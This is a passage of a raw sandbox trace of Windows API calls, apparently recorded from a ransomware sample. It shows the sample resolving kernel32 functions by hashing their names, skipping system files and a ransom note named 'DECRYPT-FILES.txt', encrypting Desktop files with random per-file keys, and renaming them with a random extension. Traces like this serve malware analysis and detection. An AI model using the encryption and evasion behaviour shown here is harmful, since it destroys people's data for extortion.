(lpString="DISABLETHREADPROFILING") returned 22 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.132] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.132] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.133] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.133] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.133] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.133] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.133] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.133] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.133] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.133] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.133] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.133] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.133] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.133] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.133] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.133] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.133] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.133] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.133] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.133] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.133] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.133] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.134] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.134] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.134] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.134] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.134] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.134] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.134] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.134] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.134] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3") returned 79 [0083.134] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3.zjo0eI") returned 86 [0083.134] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\ymux wkxle.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3.zjo0eI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\ymux wkxle.mp3.zjo0ei"), dwFlags=0x0) returned 1 [0083.134] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.135] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.135] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.135] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c227300, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0xf59226f0, ftLastAccessTime.dwHighDateTime=0x1d4c8bc, ftLastWriteTime.dwLowDateTime=0xf59226f0, ftLastWriteTime.dwHighDateTime=0x1d4c8bc, nFileSizeHigh=0x0, nFileSizeLow=0xa568, dwReserved0=0x0, dwReserved1=0x0, cFileName="yMux wkXlE.mp3", cAlternateFileName="YMUXWK~1.MP3")) returned 0 [0083.135] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0083.135] CloseHandle (hObject=0x440) returned 1 [0083.135] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadacbec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadacbec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadacbec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0083.135] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.135] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0083.135] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0083.135] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0083.136] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0083.136] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0083.136] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0083.136] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0083.136] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0083.136] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0083.136] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.136] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0083.136] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0083.136] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0083.136] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0083.136] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.136] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.136] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0083.136] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\jkbimi8.tmp" [0083.136] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.136] CloseHandle (hObject=0x0) returned 0 [0083.136] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.137] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0f77d0, ftCreationTime.dwHighDateTime=0x1d4ce9b, ftLastAccessTime.dwLowDateTime=0xc5d6a90, ftLastAccessTime.dwHighDateTime=0x1d4c9fb, ftLastWriteTime.dwLowDateTime=0xc5d6a90, ftLastWriteTime.dwHighDateTime=0x1d4c9fb, nFileSizeHigh=0x0, nFileSizeLow=0x11e84, dwReserved0=0x0, dwReserved1=0x0, cFileName="JnbB69OtwfqlLuE9CNu.png", cAlternateFileName="JNBB69~1.PNG")) returned 1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="DECRYPT-FILES.txt") returned 1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="autorun.inf") returned 1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="boot.ini") returned 1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="desktop.ini") returned 1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="ntuser.dat") returned -1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="iconcache.db") returned 1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="bootsect.bak") returned 1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="ntuser.dat.log") returned -1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="thumbs.db") returned -1 [0083.137] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png", lpString2="Bootfont.bin") returned 1 [0083.137] lstrlenW (lpString="JnbB69OtwfqlLuE9CNu.png") returned 23 [0083.137] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0083.137] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0083.137] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0083.137] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0083.137] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.137] lstrlenW (lpString="JnbB69OtwfqlLuE9CNu.png") returned 23 [0083.137] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0083.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="JnbB69OtwfqlLuE9CNu.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png" [0083.137] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\jnbb69otwfqllue9cnu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0083.137] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=73348) returned 1 [0083.137] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0083.138] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0083.138] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.138] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.138] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.138] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.138] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0083.139] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.140] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0083.141] CloseHandle (hObject=0x444) returned 1 [0083.141] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.141] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.141] CloseHandle (hObject=0x0) returned 0 [0083.141] CloseHandle (hObject=0x440) returned 1 [0083.141] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.142] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.142] GetTickCount () returned 0x114d412 [0083.142] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.142] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.142] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.142] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.143] lstrlenA (lpString="kernel32.dll") returned 12 [0083.143] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.143] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.143] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.143] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.143] lstrlenA (lpString="ADDATOMA") returned 8 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.143] lstrlenA (lpString="ADDATOMW") returned 8 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.143] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.143] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.143] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.143] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.143] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.143] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.143] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.144] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.144] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.144] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.144] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.144] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.144] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.144] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.144] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.144] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.144] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.144] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.144] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.144] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.144] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.145] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.145] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.145] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.145] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.145] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.145] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.145] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.145] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.145] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.145] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.145] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.145] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.145] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.145] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.145] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.145] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: 